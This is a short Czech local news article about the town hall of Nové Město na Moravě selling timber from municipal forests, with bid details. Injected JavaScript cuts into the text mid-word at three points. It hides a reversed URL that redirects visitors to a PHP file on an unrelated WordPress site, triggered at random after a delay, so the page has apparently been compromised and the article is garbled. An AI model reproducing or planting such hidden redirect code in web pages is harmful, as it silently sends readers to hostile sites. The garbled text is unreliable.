Rainbow page separator

Novoměstská radnice prodává vytěžené dřevo z městských lesů

Pátek, 24. března 2017

Těžba dřeva, les, dřevo

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Novoměstská radnice prodává vytěžené dřevo z městských lesů v lokalitě lesa Ochoza u Zahradníkova koutu v Novém Městě na Moravě. Jedná se především o různé druhy pilařské kulatiny o celkovém objemu 367,7 kubických metrů. Nabídky na odkup sortimentu z mýtní těžby je možné podávat elektronicky na e-mailovou adresu zdenek.krejci@ts.nmnm.cz, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v termínu do 29. března formou vyplněného a podepsaného krycího listu nabídky. Ten je včetně fo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií dřeva k dispozici na webových stránkách novoměstské radnice.
Veškerá městem nabízená dřevní hmota je prodávána jako celek, takže není možné odkoupit pouze její část. Odvoz dřeva je možný vzápětí po zaplacení faktury vystavené Novým Městem na Moravě.